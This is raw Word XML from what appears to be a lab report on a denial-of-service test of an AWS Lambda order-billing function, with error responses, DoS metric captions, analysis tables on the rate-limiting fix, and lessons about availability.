        </w:rPr>
        <w:t>status":"err","msg":"Too</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Many Requests"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B88B0B2" w14:textId="6BA1851A" w:rsidR="0059634F" w:rsidRDefault="0059634F" w:rsidP="0059634F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>And</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E01BD7" w14:textId="44BB1880" w:rsidR="0059634F" w:rsidRDefault="0059634F" w:rsidP="0059634F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>message":"Internal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> server error"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0738CDCB" w14:textId="77777777" w:rsidR="0059634F" w:rsidRDefault="0059634F" w:rsidP="0059634F">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="468548EB" wp14:editId="2CF379D7">
            <wp:extent cx="5943600" cy="1170809"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="187817439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1170809"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AF5BBE" w14:textId="5ECC8716" w:rsidR="003D19A8" w:rsidRDefault="0059634F" w:rsidP="006E5FEA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F33B81">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: status and msg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C061830" w14:textId="77777777" w:rsidR="00F33B81" w:rsidRDefault="008212BE" w:rsidP="00F33B81">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="008212BE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64673D3C" wp14:editId="22DC1757">
            <wp:extent cx="5943600" cy="2633991"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="200935148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633991"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08871657" w14:textId="207C7EA3" w:rsidR="008212BE" w:rsidRPr="00F74D88" w:rsidRDefault="00F33B81" w:rsidP="00F74D88">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F74D88">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00F74D88">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F74D88">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F74D88">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00F74D88">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F74D88">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F74D88">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Metrices resulting from DoS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69570A44" w14:textId="4905340A" w:rsidR="008F1699" w:rsidRDefault="008F1699" w:rsidP="008F1699">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Some requests were blocked early</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B31C9FD" w14:textId="77777777" w:rsidR="008F1699" w:rsidRDefault="008F1699" w:rsidP="008F1699">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Behavior changed compared to before fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FD695C" w14:textId="0B74E747" w:rsidR="008F1699" w:rsidRPr="003D19A8" w:rsidRDefault="008F1699" w:rsidP="004E3DD4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>System shows controlled handling of requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B0E760" w14:textId="1CD8C2F4" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Structured Operation and Security Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187C3821" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="2DB8D432" w14:textId="2CFC7F12"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sidRPr="00D84B64">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Structured analysis summary — Table A</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9237" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1848"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="1848"/>
        <w:gridCol w:w="1848"/>
        <w:gridCol w:w="1848"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D84B64" w14:paraId="25064DEE" w14:textId="77777777" w:rsidTr="00D84B64">
        <w:trPr>
          <w:trHeight w:val="902"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EA0003F" w14:textId="77777777" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00051D50">
            <w:r>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B3643E7" w14:textId="718552C6" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t>Intended Rule(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD7FF02" w14:textId="55C3DDC6" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t>Artifacts Used to Infer Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BCE5EBA" w14:textId="1DB1B243" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t xml:space="preserve">Normal Behavior Evi </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D84B64">
              <w:t>dence</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4714E1BB" w14:textId="423E2FBC" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00D84B64">
              <w:t xml:space="preserve">xploit Behavior Evi </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D84B64">
              <w:t>dence</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D84B64" w14:paraId="3618346C" w14:textId="77777777" w:rsidTr="00D84B64">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DE856EF" w14:textId="2DEFA16D" w:rsidR="00D84B64" w:rsidRDefault="00EF120F" w:rsidP="00EF120F">
            <w:r w:rsidRPr="00EF120F">
              <w:t>DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="555C06DC" w14:textId="45964EB8" w:rsidR="00D84B64" w:rsidRDefault="00EF120F" w:rsidP="00EF120F">
            <w:r w:rsidRPr="00EF120F">
              <w:t>System should handle requests without failure and prevent abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="467FFF76" w14:textId="5A28370F" w:rsidR="00D84B64" w:rsidRDefault="00EF120F" w:rsidP="00EF120F">
            <w:r w:rsidRPr="00EF120F">
              <w:t>Terminal output, API responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37782E08" w14:textId="29A2E4EF" w:rsidR="00D84B64" w:rsidRDefault="00EF120F" w:rsidP="00EF120F">
            <w:r w:rsidRPr="00EF120F">
              <w:t>Single request processed normally</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="188AAC6B" w14:textId="4EDBEDBC" w:rsidR="00D84B64" w:rsidRDefault="00EF120F" w:rsidP="00EF120F">
            <w:r w:rsidRPr="00EF120F">
              <w:t>Multiple concurrent requests cause failures and instability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DBF25F8" w14:textId="77777777" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="64C42F67" w14:textId="548DD7BB" w:rsidR="006F7A58" w:rsidRDefault="006F7A58">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="609A08DC" w14:textId="77777777" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5010B3A8" w14:textId="007839E6" w:rsidR="00D84B64" w:rsidRPr="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Structured analysis summary — Table B:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9252" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1504"/>
        <w:gridCol w:w="1366"/>
        <w:gridCol w:w="1365"/>
        <w:gridCol w:w="2041"/>
        <w:gridCol w:w="1452"/>
        <w:gridCol w:w="1524"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A6D07" w14:paraId="76CA67A6" w14:textId="77777777" w:rsidTr="007A6D07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F402AC4" w14:textId="2B6A2B3C" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="00BA72A1">
            <w:r>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BB58ADA" w14:textId="59267A70" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Why This Is a Deviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E9CAB62" w14:textId="19D58B0C" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Deviation Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="128DC4CD" w14:textId="77777777" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Fix</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Applied</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B678E84" w14:textId="63C3B740" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r>
              <w:t>(where)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ED33578" w14:textId="70139375" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Post-Fix Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67B71C6D" w14:textId="0FD3B43A" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t xml:space="preserve">Optional Latency </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A6D07">
              <w:t>Be fore</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007A6D07">
              <w:t xml:space="preserve"> / After Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A6D07" w14:paraId="346904DB" w14:textId="77777777" w:rsidTr="007A6D07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DF73447" w14:textId="2C44230B" w:rsidR="007A6D07" w:rsidRDefault="00D4656F" w:rsidP="00D4656F">
            <w:r w:rsidRPr="00D4656F">
              <w:t>DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F9D7411" w14:textId="1B2B9166" w:rsidR="007A6D07" w:rsidRDefault="00D4656F" w:rsidP="00D4656F">
            <w:r w:rsidRPr="00D4656F">
              <w:t>System allows unlimited requests causing overload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="767A75B5" w14:textId="723BE2D6" w:rsidR="007A6D07" w:rsidRDefault="00D4656F" w:rsidP="00D4656F">
            <w:r w:rsidRPr="00D4656F">
              <w:t>Misuse / abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="150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4656F" w:rsidRPr="00D4656F" w14:paraId="46FDB6E4" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="325D7928" w14:textId="77777777" w:rsidR="00D4656F" w:rsidRPr="00D4656F" w:rsidRDefault="00D4656F" w:rsidP="00D4656F">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="0E5E2DFC" w14:textId="77777777" w:rsidR="00D4656F" w:rsidRPr="00D4656F" w:rsidRDefault="00D4656F" w:rsidP="00D4656F">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tblGrid>
            <w:tr w:rsidR="00D4656F" w:rsidRPr="00D4656F" w14:paraId="5D7379A0" w14:textId="77777777">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="4E16D844" w14:textId="77777777" w:rsidR="00D4656F" w:rsidRPr="00D4656F" w:rsidRDefault="00D4656F" w:rsidP="00D4656F">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00D4656F">
                    <w:t>Lambda (order_billing.py)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="5302902C" w14:textId="77777777" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="00BA72A1"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2461C5B9" w14:textId="5C23E42C" w:rsidR="007A6D07" w:rsidRDefault="00D4656F" w:rsidP="00D4656F">
            <w:r w:rsidRPr="00D4656F">
              <w:t>Requests partially blocked and behavior changed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55EB0699" w14:textId="17F399F4" w:rsidR="007A6D07" w:rsidRDefault="00D4656F" w:rsidP="00D4656F">
            <w:r w:rsidRPr="00D4656F">
              <w:t>Not measured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70E163AC" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="19F2D1DB" w14:textId="7EA07071" w:rsidR="00956299" w:rsidRDefault="00956299" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00956299">
        <w:t>Takeaway / Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC75B84" w14:textId="2BC7CADB" w:rsidR="00BE1E89" w:rsidRDefault="00BE1E89" w:rsidP="00C07DD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>This lesson shows that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710EB86F" w14:textId="77777777" w:rsidR="00BE1E89" w:rsidRDefault="00BE1E89" w:rsidP="00C07DD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Serverless systems are vulnerable to DoS if no rate limiting is applied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC6604D" w14:textId="77777777" w:rsidR="00BE1E89" w:rsidRDefault="00BE1E89" w:rsidP="00C07DD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Even managed services like AWS Lambda can be overwhelmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F978601" w14:textId="2A020D5F" w:rsidR="00BE1E89" w:rsidRDefault="00BE1E89" w:rsidP="00C07DD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Availability is a critical security property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6970850A" w14:textId="1BB5D6E7" w:rsidR="00BE1E89" w:rsidRDefault="00BE1E89" w:rsidP="00C07DD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Key principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9D4532" w14:textId="1CACC60C" w:rsidR="00FA4956" w:rsidRPr="00FA4956" w:rsidRDefault="00BE1E89" w:rsidP="00C07DD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Systems must enforce rate limiting, request validation, and resource control to prevent abuse and maintain availability.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FA4956" w:rsidRPr="00FA4956" w:rsidSect="000A57D4">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0BA7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="31C81FAE"/>
    <w:lvl w:ilvl="0" w:tplc="2F202BBC">
      <w:start w:val="5"/>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E31B50"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A43ADE72"/>
    <w:lvl w:ilvl="0" w:tplc="B5BA2292">
      <w:start w:val="8"/>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B170F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B82E242"/>
    <w:lvl w:ilvl="0" w:tplc="38822450">
      <w:start w:val="4"/>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870FC1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A28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107EA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="81E802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1524C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09CC1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C70F6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE2223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C31872"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC7E0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514000"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1430C1D0"/>
    <w:lvl w:ilvl="0" w:tplc="241E097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8285038"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34367130"/>
    <w:lvl w:ilvl="0" w:tplc="DAF47334">
      <w:start w:val="9"/>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B519AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84484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7419E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD0EE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8033359"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E263E4C"/>
    <w:lvl w:ilvl="0" w:tplc="397CA8E0">
      <w:start w:val="1"/>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4F40E8"/>
